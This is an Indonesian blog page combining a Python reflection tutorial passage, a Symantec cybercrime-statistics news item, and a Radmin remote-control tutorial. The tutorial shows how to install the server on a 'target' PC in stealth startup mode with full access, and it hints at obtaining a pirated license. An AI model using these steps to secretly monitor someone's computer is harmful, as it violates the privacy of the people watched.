maka __doc__ secara ajaib telah terisi. Ya. __doc__, sesuai namanya, akan diisi oleh Python dengan string pertama pada sebuah definisi kelas atau fungsi. Programer Python biasanya menaruh dokumentasi singkat di dalam string ini. Sehingga jika ingin melihatnya nanti bisa dengan mudah mengintip __doc__. Python akan mengambilkan nilai string ini untuk Anda. Cobalah mengintip ke dalam file os.py (lokasinya di /usr/lib/python2.2/os.py atau bisa berbeda di sistem Anda). Maka Anda akan dapat melihat banyak docstring yang nantinya bisa Anda lihat lagi dari Python dengan mengakses __doc__. Refleksi yang satu ini amat mempermudah kita dalam mengekstrak dokumentasi dari program Python itu sendiri.

Catatan: pass pada definisi kelas Titik di atas boleh ada atau tidak. Pada kasus sebelumnya wajib ada karena Python membutuhkan minimal satu statement untuk definisi kelas.
Metode Objek

Sampai sejauh ini objek titik kita���meski bisa diisi atribut apa saja���tetap saja agak-agak garing karena tidak bisa kita apa-apakan lagi. Dengan kata lain, tidak ada operasi yang tersedia untuk objek kita ini. Bagaimana caranya mendefinisikan operasi untuk jenis objek kita? Jawabnya: dengan mendefinisikan fungsi di dalam definisi kelas. Definisikan kembali kelas Titik kita sbb.:

class Titik:
"Titik yang dapat dipindah-pindahkan."

def __init__(self, initialX, initialY):
self.x = initialX
self.y = initialY

def move(self, amountX, amountY):
"""move(amountX, amountY) -> None

Pindahkan titik sebanyak amountX ke kanan, amountY ke atas."""
self.x += amountX
self.y += amountY

def whereami(self):
print "Aku ada di (%d, %d)" % (self.x, self.y)

Ada beberapa hal yang perlu diperhatikan. Pertama, kita mendefinisikan dua operasi bagi instans kelas Titik, yaitu move() dan whereami() dan sebuah operasi khusus __init__() untuk menginisialisasi atribut-atribut awal objek. Kedua, __init__() tidak dipanggil manual, tapi akan dipanggil saat kita membuat objek Titik(). Ketiga, perhatikan bahwa argumen pertama semua metode ini adalah self. Python memang menyisipkan instans kelas kita nanti di argumen pertama, agar tiap fungsi/metode ini dapat mengakses isi instans kelas. Waktu kita memanggil metode dengan sintaks obj.namametode(a, b, c) nanti, self tidak perlu disebutkan lagi karena akan dimasukkan secara otomatis oleh Python menjadi obj.namametode(obj, a, b, c). Empat, perhatikan pula kita memberi docstring pada kelas Titik (docstring satu baris) dan pada metode move() (docstring banyak baris/multiline).

Setelah kelas Titik didefinisikan, mari membuat instansnya. Karena terdapat __init__ yang menerima dua argumen (di luar self), maka kita dapat membuat instans objek Titik dengan cara:

>>> t = Titik(5, 10)

Andaikata tidak ada __init__(), kita tetap dapat membuat sebuah titik yang berlokasi awal di koordinat (5, 10) dengan cara:

>>> t = Titik()
>>> t.x = 5
>>> t.y = 10

Jadi kegunaan __init__() adalah sebagai notasi ringkas inisialisasi objek.

Mari kita coba menggunakan metode-metode objek kita:

>>> t.whereami()
Aku ada di (5, 10)
>>> t.move(1,1)
>>> t.whereami()
Aku ada di (6, 11)
>>> t.move(-1,1)
>>> t.whereami()
Aku ada di (5, 12)

Akhirnya, titik kita sudah lebih keren sekarang. Bisa dipindah-pindahkan dengan operasi buatan sendiri.
Refleksi Lagi

Apakah kita bisa mengintip objek kelas Titik maupun instans-instansnya dengan fasilitas refleksi? Tentu saja. Berikut contoh-contohnya.

>>> t=Titik(5, 10)
>>> dir(Titik)
['__doc__', '__init__', '__module__', 'move', 'whereami']
>>> dir(t)
['__doc__', '__init__', '__module__', 'move', 'whereami', 'x', 'y']
>>> t.__doc__
'Titik yang dapat digerak-gerakkan.'
>>> t.move.__doc__
'move(amountX, amountY) -> None\n\n Pindahkan titik sebanyak
amountX ke kanan, amountY ke atas.'
>>> t.__dict__
{'y': 10, 'x': 5}
>>> t.__dict__['x'] = 10
>>> t.__dict__['y'] = 1
>>> t.move(-5, 9)
>>> t.__dict__
{'y': 10, 'x': 5}
>>> _

Penutup

Pada kesempatan lain kita akan lebih jauh membahas mengenai metode dan paradigma OO seperti pewarisan. Sementara itu, Anda bisa mencoba sebuah modul standar bernama inspect. Modul ini membantu kita melakukan refleksi dengan lebih praktis. Bagaimana cara menggunakan modul ini? Anda bisa membaca manual Python atau��� terlebih dahulu mengintip modul inspect ini dengan refleksi yang disediakan Python! Selamat berefleksi. (sh)

Rabu, 16 Juni 2010


Cyber Crime -Tindakan kriminal yang dilakukan melalui Dunia Maya ini sepertinya semakin lama semakin berbahaya. Salah satu pengembang perangkat lunak terkemuka, Symantec, mengungkap 10 fakta serius mengenai keamanan internet yang tidak dapat diabaikan hingga Maret 2010 ini.
Berdasarkan keterangan tertulis Symantec yang diterima oleh detik.NET, Senin (8/3/2010), para penjahat cyber terus mencari cara-cara baru serta canggih untuk menyerang pengguna internet kelas konsumer dan enterprise.

Misalkan saat gempa Haiti beberapa saat lalu. Banyak spammer memanfaatkan kejadian tersebut, untuk mengeruk keuntungan pribadi. Belum lagi munculnya platform-platform baru seperti iPad, yang menambah serangan berbasis SEO (search engine optimization).

Berikut adalah 10 fakta serius mengenai keamanan yang tidak dapat diabaikan pada 2010:

1. Serangan Cyber Merugikan Banyak Perusahaan. 75% perusahaan besar menderita akibat serangan cyber dalam 12 bulan terakhir, dengan kerugian rata-rata mencapai US$2 juta per tahun.

2. Pergeseran Spam Global. Asia Pasific, Jepang serta Amerika Selatan mengambil alih posisi Amerika Utara dan EMEA sebagai sumber spam tersebesar.

3. Urutan Tertinggi dalam Daftar Aktivitas Jahat. China menempati urutan tertinggi dalam aktivitas jahat, mencapai 25% dari total di seluruh dunia.

4. Kartu Kredit Paling Laris Diperdagangkan. Informasi kartu kredit adalah yang paling umum diiklankan untuk diperjualbelikan di ekonomi bawah tanah, mencapai 18% dari seluruh barang dan layanan.

5. Bank-bank Menjadi Sasaran Phishing. 76% merek yang digunakan dalam serangan phishing pada 2010 berada di sektor keuangan.

6. Spam Tradisional Hilang, Scam dengan Target Khusus Muncul. Jumlah total pesan scam dan phishing mencapai 21% dari seluruh spam, merupakan yang tertinggi sejak 2007.

7. Agenda Baru Mendorong Serangan. Gempa di Haiti telah meningkatkan volume pesan scam dan phishing ketika spammer menggunakan kejadian tragis ini untuk mengeruk keuntungan.

8. Asia Pasifik dan Jepang rentan diserang. Asia Pasifik dan Jepang adalah daerah dengan serangan berbasis web terbesar pada Oktober-Desember 2009.

9. Semakin Populernya Sebuah Platform Baru akan Mendorong Serangan. Ketika pencarian istilah iPad meningkat, serangan berbasis SEO (search engine optimization) dan phishing teramati selama peluncuran Apple iPad.

10. Para Penjahat Cyber Mencuri Informasi, Bukan Infrastruktur. Pencurian kekayaan intelektual dilaporkan merupakan kerugian cyber terbesar di kalangan dunia bisnis Singapura.

Sabtu, 12 Juni 2010

Btw tulisan ini dibuat untuk menjawab pertanyaan yang pernah ditanyakan
Kepada penulis tentang remote antar Client [ LAN ],

Tulisan ini untuk menerangkan cara pembuatan Remote untuk mengontrol PC client , dimana akan kita ambil contoh penginstalan software RADMIN [ remote admin ] karena software itu paling sering digunakan oleh kita semua [ btw penulis nyubi habis ],

Kilas balik ke tahun lalu , waktu penulis berkunjung ke rumah kawan [ cwek loh ] dia sangat kesal karena setiap aktivitas yang dilakukannya di di depan computer kerja selalu terlihat walau dia sama sekali tidak tahu sampai-sampai untuk urusan email yang bersifat rahasia dilihat juga [ gimana ga kesal L] ,So dia coba Tanya ke penulis kok sampai tahu seh orang IT di tempat dia bekerja [ administrasi di salah satu kampus computer ] segala kegiatan dia selama di depan computer, sampai-sampai dia merasa orang IT di tempat dia bekerja mengetahui user sama password email dia [ wedew jangan-jangan ada yang rahasia ] J.
Penulis coba terangkan sebisa mungkin rahasia mereka karena penulis tidak mau kawan dibodohi dengan ulah para IT yang selalu mengawasi kegiatan para karyawannya [ kalau hanya sekedar memantau kegiatan karyawannya yang bermain game di waktu bekerja she hal wajar, tapi kalau sampai memantau hal yang bersifat rahasia wah itu uda kelewatan ],
Btw langsung aja kita coba lakukan install remote oleh software RADMIN version 3.
[ baru sempet buat tutornya , maklum Sibuk ]

Siapkan Samsu + Kopi + Pecel Lele, btw langsung menuju situs radmin yang terletak di www.famatech.com, ambil versi trial untuk 30 hari [ Full Lisensi cari di Google ] ,

Disana nanti ada 2 buah file yaitu rserv30 dan rview30, untuk melihat client kita install rview30 dan untuk target kita install rserv30, btw langung install rview30 di depan computer kita, lihat hasil installan dibawah ini jalankan:

Setelah Beres, kemudian beralih ke pc target install rserv30 di pc target , kemudian
jalankan software tersebut:

kita bisa setting konfigurasi dari menu target , cek satu persatu,
Startup mode untuk menjalankan remote dari stealth, biarkan saja akan berjalan secara otomatis, Option untuk mensetting port yang akan digunakan, chatt config, log history, dll, untuk port harus setting dari client dan server, contoh option liat dibawah ini:

Permission untuk melakukan setting password, yang berfungsi untuk memberikan keamanan kepada server [ kerennya mah orang biar ga tahu kalo buka radmin view ],

ada 2 security mode , Radmin security berbasis Win9x, dan Windows NT security
untuk berbasis Win2k [ Server NT ], btw kita setting yang umum aja , pakai radmin security , klik permissions

Isi nama dan password , terserah , kemudian klik OK, kemudian klik All access maka kita dapat melakukan control penuh terhadap target

Nah setelah kita selesai setting, maka kita coba melakukan koneksi ke pc target [ wedew kesannya serem banget ]

untuk mengetahui IP target anda dapet lakukan dengan cara melihat properti di My Network Places dengan klik kanan kemudian klik kanan Local Area Connection, lihat Internet Protocol [ TCP /IP ] ga susah , daripada make under DOS [ kan belajar simple dan praktis ] J.

Setelah dapat silakan anda tambahkan di dalam kolom RadminView add IP target kemudian klik ok [ akan nampak hasilnya seperti diatas ], trus anda tinggal arahkan mau diapakan tuh pc target bisa Full Control, ViewControl, Chatt, telnet, File transfer , Restat, ShutDown, Dll pokoknya ada semua J, nah untuk masuk ke pc target akan diminta password dan user [ ini user dan password yang tadi kita setting ] mengapa memakai password ? jawabannya simple agar orang lain selain bukan anda tidak bisa melihat –lihat pc yang kita remote tadi.

Dibawah ini merupakan hasil dari monitoring client, kita bisa lakukan remote untuk bermacam2 keperluan:

Nah semua yang berhubungan dengan aktifitas mata – mematai membutuhkan port untuk bisa koneksi dari Server ke Client , untuk pemakaian default RADMIN menggunakan port 4899, nah untuk mematikan secara darurat bisa dengan menghidupkan firewall di pc target , maka akan otomatis port 4899 terblock yang menyebabkan koneksi dari server ke client mati [ remotenya tidak bisa hidup ]

Sekian semoga tutorial ini bisa mengobatin hati kawan yang sangat kecewa terhadap tempat dia bekerja [ heueheu padahal udah keluar dia dari kerjaannya ]



Note : Untuk User yang melakukan aktifitas di warnet – warnet agar lebih berhati-hati karena sebagian besar Operator warnet sering memata – matai anda , dan para IT yang bekerja di perusahaan agar lebih bijak menggunakan remote untuk keperluan perusahaan [ atau memang IT –nya mau cari muka sama bos, kekkekke just kidding ]
Segala kegiatan memata – matai client entah mau memakai software radmin, Vpn, easyremote, or sejenisnya bagaikan pisau bermata dua, tergantung dari Etika dan Moral yang mnggunakannya [ wedew kaya ulama aja, ]